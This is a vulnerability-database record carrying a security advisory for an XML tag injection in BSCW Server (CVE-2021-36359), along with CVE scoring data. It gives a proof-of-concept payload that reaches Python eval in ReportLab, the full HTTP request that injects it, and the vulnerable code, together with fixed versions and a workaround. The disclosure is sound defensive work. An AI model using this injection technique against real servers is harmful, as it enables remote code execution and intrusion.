{"id": "PACKETSTORM:163988", "type": "packetstorm", "bulletinFamily": "exploit", "title": "BSCW Server XML Injection", "description": "", "published": "2021-08-31T00:00:00", "modified": "2021-08-31T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/163988/BSCW-Server-XML-Injection.html", "reporter": "Armin Stock", "references": [], "cvelist": ["CVE-2021-36359"], "immutableFields": [], "lastseen": "2021-08-31T21:43:05", "viewCount": 60, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-36359"]}, {"type": "zdt", "idList": ["1337DAY-ID-36692"]}], "rev": 4}, "score": {"value": 5.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-36359"]}, {"type": "zdt", "idList": ["1337DAY-ID-36692"]}]}, "exploitation": null, "vulnersScore": 5.1}, "sourceHref": "https://packetstormsecurity.com/files/download/163988/SA-20210827-1.txt", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20210827-1 > \n======================================================================= \ntitle: XML Tag injection \nproduct: BSCW Server \nvulnerable version: BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2 \nfixed version: 5.0.12, 5.1.10, 5.2.4, 7.3.3, 7.4.3 \nCVE number: CVE-2021-36359 \nimpact: high \nhomepage: https://www.bscw.de/classic/ \nfound: 2021-06-30 \nby: Armin Stock (Atos Germany) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult, an Atos company \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"A versatile system for any field of application \n \nBSCW Classic is in use around the world. With more than 500 functions, it \noffers the right solution for every task. Turn your ideas into reality! 
Our \nproven system has been supporting information flow and knowledge management at \nnumerous companies for more than 20 years.\" \n \nSource: https://www.bscw.de/en/classic/ \n \n \nBusiness recommendation: \n------------------------ \nThe vendor provides a patched version for the affected products, which should \nbe installed immediately. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) XML Tag injection \nThe application allows a user with low privileges to export different objects \nto a `PDF` file (`Send To -> File(PDF)`) via the `exportpdf` package. To \nexport the content of the objects the framework ReportLab is used. This library \nsupports different tags to export structured content: \n \n------------------------------------------------------------------------------- \n# File: reportlab/platypus/paraparser.py \n!!! NOTE !!! THIS TEXT IS NOW REPLICATED IN PARAGRAPH.PY !!! \nThe ParaFormatter will be able to format the following \ntags: \n< /b > - bold \n< /i > - italics \n< u [color=\"red\"] [width=\"pts\"] [offset=\"pts\"]> < /u > - underline \nwidth and offset can be empty meaning use existing canvas line width \nor with an f/F suffix regarded as a fraction of the font size \n< strike > < /strike > - strike through has the same parameters as underline \n< super [size=\"pts\"] [rise=\"pts\"]> < /super > - superscript \n< sup =\"pts\"] [rise=\"pts\"]> < /sup > - superscript \n< sub =\"pts\"] [rise=\"pts\"]> < /sub > - subscript \n<font name=fontfamily/fontname color=colorname size=float> \n<span name=fontfamily/fontname color=colorname backcolor=colorname size=float style=stylename> \n< bullet > </bullet> - bullet text (at head of para only) \n<onDraw name=callable label=\"a label\"/> \n<index [name=\"callablecanvasattribute\"] label=\"a label\"/> \n<link>link text</link> \nattributes of links \nsize/fontSize/uwidth/uoffset=num \nname/face/fontName=name \nfg/textColor/color/ucolor=color 
\nbackcolor/backColor/bgcolor=color \ndest/destination/target/href/link=target \nunderline=bool turn on underline \n<a>anchor text</a> \nattributes of anchors \nfontSize=num \nfontName=name \nfg/textColor/color=color \nbackcolor/backColor/bgcolor=color \nhref=href \n<a name=\"anchorpoint\"/> \n<unichar name=\"unicode character name\"/> \n<unichar value=\"unicode code point\"/> \n<img src=\"path\" width=\"1in\" height=\"1in\" valign=\"bottom\"/> \nwidth=\"w%\" --> fontSize*w/100 idea from Roberto Alsina \nheight=\"h%\" --> linewidth*h/100 <ralsina@netmanagers.com.ar> \n<greek> - </greek> \n<nobr> ... </nobr> turn off word breaking and hyphenation \n \nThe whole may be surrounded by <para> </para> tags \n------------------------------------------------------------------------------- \n \nThe application does not properly encode the user content before passing it to \n`ReportLab`, which allows the user to inject their own tags. These tags get evaluated \nby `ReportLab`. \n \nDepending on the version of `ReportLab` it allows the user to do a `SSRF` \n(server side request forgery) attack via the `img` tag \n(https://snyk.io/vuln/SNYK-PYTHON-REPORTLAB-1022145). \n \nThere are also known vulnerabilities in `ReportLab`: \n \n* https://www.cybersecurity-help.cz/vdb/SB2019101613 \n* https://hg.reportlab.com/hg-public/reportlab/rev/b117091a73c2 \n \nThis allows an attacker to execute `Python` code via the `unichar` tag or the \n`color` attribute. \n \n \nProof of concept: \n----------------- \n1) XML Tag injection \nOne possible injection point is the `description` of a folder. Using the \nfollowing payload allows the execution of the `Python` code `28+20`. \n \n<strike>hello</strike><unichar code=\"28+20\"/> \n \nThe result of this code is `48` (ASCII: `0`), which gets written to the \ngenerated `PDF` file. 
\n \n------------------------------------------------------------------------------- \nPOST /sec/bscw.cgi/1917?op=_editfolder.EditFolder HTTP/1.1 \n \nHost: bscw.local:8080 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 765 \nOrigin: http://bscw.local:8080 \nDNT: 1 \nConnection: keep-alive \nReferer: http://bscw.local:8080/sec/bscw.cgi/1917?op=editfolder.EditFolder&id=1917_2088&inside_dialog=1 \nCookie: MicroblogInboxIndicatorState=%5B1629367994%2C0%5D; MicroblogSlidingPanelDisplayState=%22hidden%22; bscw_dummy_cookie=opensesame; bscw_auth=\"wsZjskopxMc1MSIVJq1bnn0fqKqLR9hB:108\"; _sec_bscws=\"45aa7a088a17c12646aaf10d670395cb:264\" \nUpgrade-Insecure-Requests: 1 \n \n \nop=editfolder.EditFolder&inside_dialog=1&bscw_v_post=cCzT8tEnZ1kR%2FnH6gC15aLTjerCLR9hB&id=1917_2088&_selected=editfolder.NameTagsDescrRate&_editfolder.NameTagsDescrRate_renameo.Chname_name=hello&_editfolder.NameTagsDescrRate_renameo.Chname_=3&_editfolder.NameTagsDescrRate_chtags.EditTags_tags=&_editfolder.NameTagsDescrRate_chtags.EditTags_=3&_editfolder.NameTagsDescrRate_chdescr.Chdescr_descr=<strike>hello</strike><unichar code=\"28+20\"/>&_editfolder.NameTagsDescrRate_chdescr.Chdescr_=3&_editfolder.NameTagsDescrRate_=3&_approval.approval_approval_choice=approval_inherited&_approval.approval_addactions=approval.approval.ApprovalTaskItem&_approval.approval_=3&_autovers_maxvers=inherit&_autovers_mvnr=&_autovers_=3&_=3&__ok_.x=+++OK+++ \n------------------------------------------------------------------------------- \n \nThe vulnerable code in the `ReportLab` framework: \n------------------------------------------------------------------------------- \n# File: reportlab\\platypus\\paraparser.py \ndef start_unichar(self, attr): \nif 'name' in attr: 
\nif 'code' in attr: \nself._syntax_error('<unichar/> invalid with both name and code attributes') \ntry: \nv = unicodedata.lookup(attr['name']) \nexcept KeyError: \nself._syntax_error('<unichar/> invalid name attribute\\n\"%s\"' % ascii(attr['name'])) \nv = '\\0' \nelif 'code' in attr: \ntry: \nv = int(eval(attr['code'])) \nv = chr(v) if isPy3 else unichr(v) \nexcept: \nself._syntax_error('<unichar/> invalid code attribute %s' % ascii(attr['code'])) \nv = '\\0' \n------------------------------------------------------------------------------- \nMost likely there are more injection points to include own tags, but no further \nactions were taken to find them. \n \n \nVulnerable / tested versions: \n----------------------------- \nBSCW Classic 5.2.3 has been used to identify the vulnerability. \n \nThe vendor confirmed the following versions to be also affected by the \nvulnerability: \nBSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2 \n \n \nVendor contact timeline: \n------------------------ \n2021-07-31: Sent report to vendor. \n2021-08-01: Vendor confirmed the issue and is working on a patch. \n2021-08-19: Vendor notified licensed customers about the issue and a patch. \n2021-08-27: Coordinated release of security advisory. \n \n \nSolution: \n--------- \nThe vendor provides a patched version for the affected and supported products, \nwhich should be installed immediately. \n \nAdditional information can be viewed at the vendor's support page. \n \n \nWorkaround: \n----------- \nEnsure the used `ReportLab` version is >= `3.5.55` to mitigate active \nexploitation of these known vulnerabilities. \nIt is also possible to disable the `Export to PDF` function. This should be the \npreferred way, until the vendor provides a patch. 
\n \n$ bin/bsadmin package -d exportpdf \n \n \n \nAdvisory URL: \n------------- \nhttps://sec-consult.com/vulnerability-lab/ \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult, an Atos company \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an \nAtos company. It ensures the continued knowledge gain of SEC Consult in the \nfield of network and application security to stay ahead of the attacker. The \nSEC Consult Vulnerability Lab supports high-quality penetration testing and \nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities \nand valid recommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://sec-consult.com/career/ \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://sec-consult.com/contact/ \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF Armin Stock / @2021 \n \n`\n", "_state": {"dependencies": 1645947128}}
{"zdt": [{"lastseen": "2021-12-04T15:51:15", "description": "BSCW Server versions 7.4.2 and below, 7.3.2 and below, 5.2.3 and below, 5.1.9 and below, and 5.0.11 and below suffer from an XML tag injection vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-31T00:00:00", "type": "zdt", "title": "BSCW Server XML Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36359"], "modified": "2021-08-31T00:00:00", "id": "1337DAY-ID-36692", "href": "https://0day.today/exploit/description/36692", "sourceData": "=======================================================================\n title: XML Tag injection\n product: BSCW Server\n vulnerable version: BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2\n fixed version: 5.0.12, 5.1.10, 5.2.4, 7.3.3, 7.4.3\n CVE number: CVE-2021-36359\n impact: high\n homepage: https://www.bscw.de/classic/\n found: 2021-06-30\n by: Armin Stock (Atos Germany)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n 
https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"A versatile system for any field of application\n\nBSCW Classic is in use around the world. With more than 500 functions, it\noffers the right solution for every task. Turn your ideas into reality! Our\nproven system has been supporting information flow and knowledge management at\nnumerous companies for more than 20 years.\"\n\nSource: https://www.bscw.de/en/classic/\n\n\nBusiness recommendation:\n------------------------\nThe vendor provides a patched version for the affected products, which should\nbe installed immediately.\n\n\nVulnerability overview/description:\n-----------------------------------\n1) XML Tag injection\nThe application allows a user with low privileges to export different objects\nto a `PDF` file (`Send To -> File(PDF)`) via the `exportpdf` package. To\nexport the content of the objects the framework ReportLab is used. This library\nsupports different tags to export structured content:\n\n-------------------------------------------------------------------------------\n# File: reportlab/platypus/paraparser.py\n !!! NOTE !!! 
THIS TEXT IS NOW REPLICATED IN PARAGRAPH.PY !!!\n The ParaFormatter will be able to format the following\n tags:\n < /b > - bold\n < /i > - italics\n < u [color=\"red\"] [width=\"pts\"] [offset=\"pts\"]> < /u > - underline\n width and offset can be empty meaning use existing canvas line width\n or with an f/F suffix regarded as a fraction of the font size\n < strike > < /strike > - strike through has the same parameters as underline\n < super [size=\"pts\"] [rise=\"pts\"]> < /super > - superscript\n < sup =\"pts\"] [rise=\"pts\"]> < /sup > - superscript\n < sub =\"pts\"] [rise=\"pts\"]> < /sub > - subscript\n <font name=fontfamily/fontname color=colorname size=float>\n <span name=fontfamily/fontname color=colorname backcolor=colorname size=float style=stylename>\n < bullet > </bullet> - bullet text (at head of para only)\n <onDraw name=callable label=\"a label\"/>\n <index [name=\"callablecanvasattribute\"] label=\"a label\"/>\n <link>link text</link>\n attributes of links\n size/fontSize/uwidth/uoffset=num\n name/face/fontName=name\n fg/textColor/color/ucolor=color\n backcolor/backColor/bgcolor=color\n dest/destination/target/href/link=target\n underline=bool turn on underline\n <a>anchor text</a>\n attributes of anchors\n fontSize=num\n fontName=name\n fg/textColor/color=color\n backcolor/backColor/bgcolor=color\n href=href\n <a name=\"anchorpoint\"/>\n <unichar name=\"unicode character name\"/>\n <unichar value=\"unicode code point\"/>\n <img src=\"path\" width=\"1in\" height=\"1in\" valign=\"bottom\"/>\n width=\"w%\" --> fontSize*w/100 idea from Roberto Alsina\n height=\"h%\" --> linewidth*h/100 <ralsina@netmanagers.com.ar>\n <greek> - </greek>\n <nobr> ... 
</nobr> turn off word breaking and hyphenation\n\n The whole may be surrounded by <para> </para> tags\n-------------------------------------------------------------------------------\n\nThe application does not properly encode the user content before passing it to\n`ReportLab`, which allows the user to inject their own tags. These tags get evaluated\nby `ReportLab`.\n\nDepending on the version of `ReportLab` it allows the user to do a `SSRF`\n(server side request forgery) attack via the `img` tag\n(https://snyk.io/vuln/SNYK-PYTHON-REPORTLAB-1022145).\n\nThere are also known vulnerabilities in `ReportLab`:\n\n* https://www.cybersecurity-help.cz/vdb/SB2019101613\n* https://hg.reportlab.com/hg-public/reportlab/rev/b117091a73c2\n\nThis allows an attacker to execute `Python` code via the `unichar` tag or the\n`color` attribute.\n\n\nProof of concept:\n-----------------\n1) XML Tag injection\nOne possible injection point is the `description` of a folder. Using the\nfollowing payload allows the execution of the `Python` code `28+20`.\n\n<strike>hello</strike><unichar code=\"28+20\"/>\n\nThe result of this code is `48` (ASCII: `0`), which gets written to the\ngenerated `PDF` file.\n\n-------------------------------------------------------------------------------\nPOST /sec/bscw.cgi/1917?op=_editfolder.EditFolder HTTP/1.1\n\nHost: bscw.local:8080\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 765\nOrigin: http://bscw.local:8080\nDNT: 1\nConnection: keep-alive\nReferer: http://bscw.local:8080/sec/bscw.cgi/1917?op=editfolder.EditFolder&id=1917_2088&inside_dialog=1\nCookie: MicroblogInboxIndicatorState=%5B1629367994%2C0%5D; MicroblogSlidingPanelDisplayState=%22hidden%22; bscw_dummy_cookie=opensesame; 
bscw_auth=\"wsZjskopxMc1MSIVJq1bnn0fqKqLR9hB:108\"; _sec_bscws=\"45aa7a088a17c12646aaf10d670395cb:264\"\nUpgrade-Insecure-Requests: 1\n\n\nop=editfolder.EditFolder&inside_dialog=1&bscw_v_post=cCzT8tEnZ1kR%2FnH6gC15aLTjerCLR9hB&id=1917_2088&_selected=editfolder.NameTagsDescrRate&_editfolder.NameTagsDescrRate_renameo.Chname_name=hello&_editfolder.NameTagsDescrRate_renameo.Chname_=3&_editfolder.NameTagsDescrRate_chtags.EditTags_tags=&_editfolder.NameTagsDescrRate_chtags.EditTags_=3&_editfolder.NameTagsDescrRate_chdescr.Chdescr_descr=<strike>hello</strike><unichar code=\"28+20\"/>&_editfolder.NameTagsDescrRate_chdescr.Chdescr_=3&_editfolder.NameTagsDescrRate_=3&_approval.approval_approval_choice=approval_inherited&_approval.approval_addactions=approval.approval.ApprovalTaskItem&_approval.approval_=3&_autovers_maxvers=inherit&_autovers_mvnr=&_autovers_=3&_=3&__ok_.x=+++OK+++\n-------------------------------------------------------------------------------\n\nThe vulnerable code in the `ReportLab` framework:\n-------------------------------------------------------------------------------\n# File: reportlab\\platypus\\paraparser.py\ndef start_unichar(self, attr):\n if 'name' in attr:\n if 'code' in attr:\n self._syntax_error('<unichar/> invalid with both name and code attributes')\n try:\n v = unicodedata.lookup(attr['name'])\n except KeyError:\n self._syntax_error('<unichar/> invalid name attribute\\n\"%s\"' % ascii(attr['name']))\n v = '\\0'\n elif 'code' in attr:\n try:\n v = int(eval(attr['code']))\n v = chr(v) if isPy3 else unichr(v)\n except:\n self._syntax_error('<unichar/> invalid code attribute %s' % ascii(attr['code']))\n v = '\\0'\n-------------------------------------------------------------------------------\nMost likely there are more injection points to include own tags, but no further\nactions were taken to find them.\n\n\nVulnerable / tested versions:\n-----------------------------\nBSCW Classic 5.2.3 has been used to identify the vulnerability.\n\nThe 
vendor confirmed the following versions to be also affected by the\nvulnerability:\nBSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2\n\n\nVendor contact timeline:\n------------------------\n2021-07-31: Sent report to vendor.\n2021-08-01: Vendor confirmed the issue and is working on a patch.\n2021-08-19: Vendor notified licensed customers about the issue and a patch.\n2021-08-27: Coordinated release of security advisory.\n\n\nSolution:\n---------\nThe vendor provides a patched version for the affected and supported products,\nwhich should be installed immediately.\n\nAdditional information can be viewed at the vendor's support page.\n\n\nWorkaround:\n-----------\nEnsure the used `ReportLab` version is >= `3.5.55` to mitigate active\nexploitation of these known vulnerabilities.\nIt is also possible to disable the `Export to PDF` function. This should be the\npreferred way, until the vendor provides a patch.\n\n$ bin/bsadmin package -d exportpdf\n", "sourceHref": "https://0day.today/exploit/36692", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T18:52:03", "description": "OrbiTeam BSCW Classic before 7.4.3 allows exportpdf authenticated remote code execution (RCE) via XML tag injection because reportlab\\platypus\\paraparser.py (reached via bscw.cgi op=_editfolder.EditFolder) calls eval on attacker-supplied Python code. 
This is fixed in 5.0.12, 5.1.10, 5.2.4, 7.3.3, and 7.4.3.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-30T05:15:00", "type": "cve", "title": "CVE-2021-36359", "cwe": ["CWE-91"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36359"], "modified": "2021-09-01T20:14:00", "cpe": [], "id": "CVE-2021-36359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36359", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}]}